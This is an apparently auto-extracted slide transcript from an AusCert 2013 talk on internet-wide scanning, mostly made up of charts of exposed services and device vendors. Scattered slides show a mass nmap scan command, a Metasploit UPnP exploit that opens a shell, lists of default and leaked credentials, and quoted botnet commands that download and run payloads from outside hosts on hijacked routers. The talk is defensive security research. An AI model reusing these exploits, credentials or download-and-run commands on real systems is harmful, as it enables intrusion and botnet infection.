AusCert 2013: Global Network Security

Transcript

1. None

2. ► ► ►

3. ► ► ► ► ►

4. ► ► ► ► ► ► ► ► ► ►

5. ► ► ►

6. ► ► ► ► ► ► # nmap -sS -PS443

   -p443 -n --max-retries=1 -n -M 256 \ --open \ --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \ --min-hostgroup=50000 --min-rate=50000 \ --max-rate=50000 \ --script=banner-plus.nse \ --excludefile=exclude.txt \ -oG node.gnmap -oX node.xml \ -iR 250000 Code: https://gitub.com/hdm/scan-tools

7. ► ► ► ► ► ► ► Code: https://gitub.com/hdm/scan-tools

8. ► ► ► ► ► ► ► ► ► ►

9. ► ► ► ► ► ►

10. ► ► ► ► ► ► So what your saying

    is I should just ignore the excessive amount of port snooping coming from your system(s), and I should allow this on your word alone? Since when did you become my big brother? Are you related to Obama? Ironically, since the days you have begun your independent scans we have received a few DDOS attacks using udp_app port 53 traffic.....any correlation? Please identify your customer operating from the above address at the time mentioned, and terminate immediately his hacking activities. Please prevent him from continuing his hacking activities in the future as well. Due to the potential severity of this incident, we have reported it to the Computer Emergency Response Team (CERT) in United States (US) and Denmark. You are welcome to try and hack my network as an academic exercise but even if you are successful you will find nothing of interest, and any attempt to corrupt the O/S can be restored in a few minutes.

11. ► ► ► ► ► ► ► ► ►

12. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service

13. 1900 80 161 137 443 8080 23 21 22 25

    3306 110 143 995 993 5353 5900 17185 Global IPv4 Services 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Australian IPv4 Services

14. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

15. ► ► ► ► ► ►

16. ► ► ► ► ► ► ► ► ► Intel/Portable

    SDK MiniUPnP Broadcom SDK Others

17. ► ► ► ► ► ► ► ► ► ►

18. ► ► ► ► $ msfconsole msf > use exploit/multi/upnp/libupnp_ssdp_overflow

    msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89 msf exploit(libupnp_ssdp_overflow) > exploit [*] Started reverse double handler [*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM) [+] Sending payload of 178 bytes to 192.168.122.89:56911... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command shell session 1 opened [*] Shutting down payload stager listener... uname -a Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl

19. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►

20. ► ► ► Apache Microsoft NginX Netcraft - January 2013

    RomPager Apache Akamai NginX Microsoft Critical.IO - January 2013

21. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ►

22. ► ► ► ► ► ► USA ESP IND TUR

    BRA ITA DEU POL RUS THA VNM CHN PER MYS ARG EGY GBR TWN KOR IDN Devices by Country

23. ► ► ► ► ► ►

24. ► ► ► ► ► ► ►

25. Usernames Passwords admin 12345 root h3capadmin lyzdm xialiang!@# lywlj nhkhwlwhz

    lymr admin lyjy 1234 lyzwm szwx@ah lyys huawei jlllylj itms123456 lygsg AAA888### lyjrw 662 lyyys abc123! lysw zch3capadmin lygmb 123456 lyfyh apadmin huawei password

26. ► ► ► ► ► username=sa password=Masterkey2011 LicenseCheck=Defne DSN=sms;UID=XXX;PWD=XXXsys; DSN=GeoXXX;UID=XXX;PWD=XXXsys;

    8383 password h4ve@gr8d3y --daemon --port 8020 --socks5 --s_user Windows --s_password System XXXX /ssh /auth=password /user=admin /passwd=admin_p@s$word http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325 a.b.c.d:3389 --user administrator --pass passw0rd123

27. ► ► ► ► ► ►

28. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

29. ► ► ► ► HUAWEI QUALCOMM ASUSTEK VMWARE HP DELL

    HYUNDAI MICROSOFT INTEL

30. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►

31. ► ► ► ► 27% 15% 10% 7% 5% 29%

    FTP Software ProFTPD PureFTP Microsoft Firmware vsFTPd Mikrotik FileZilla Speedtouch Other 1.3.3g 1.3.1 1.3.3a 1.3.4a 1.3.3e 1.3.2e ProFTPD Versions 1.3.3g 1.3.1 1.3.3a 1.3.4a 1.3.3e 1.3.2e 1.3.3c 1.3.4b 1.3.0 1.3.3d 1.3.2c 1.2.10 1.3.0a 1.2.9 1.3.5rc1 1.3.2

32. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►

33. SMTP POP3 IMAP POP3S IMAPS

34. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

35. ► ► ► VNC Protocol Versions RFB 003.008 RFB 003.889

    RFB 003.006 RFB 003.003 RFB 004.001 RFB 004.000 RFB 003.007 RFB 003.004

36. ► ► ►

37. 0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000

    100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

38. ► ► ► ► ► ►

39. ► ► ► ► 0 1000 2000 3000 4000 5000

    6000 OpenServer AIX Solaris UnixWare IRIX OpenVMS HPUX

40. ►

41. ►

42. ►

43. ► ►

44. None

45. ► ► ► ► ► ► ► ► ►

46. ► ► ► ► ► ► ► ► ► ►

    ►
47. None

48. ► ► ► ► $ telnet A.B.C.D Escape character is

    '^]'. sh-3.00# history 1 root 2 admin 3 mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh || mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &

49. ► ► # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.

    # UPLOAD GETBINARIES.SH IN YOUR HTTPD. # YOUR HTTPD SERVER: REFERENCE_HTTP="http://173.xxx.xxx.xxx" wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run … wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && … wget -c ${REFERENCE_HTTP}/sshd -P /var/run && … wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && … iptables -A INPUT -p tcp --dport 23 -j DROP mv /usr/bin/wget /usr/bin/wg mv /bin/wget /bin /wg

50. ► ► ► ► ► ► ► ►

51. ► ► ► ►

52. None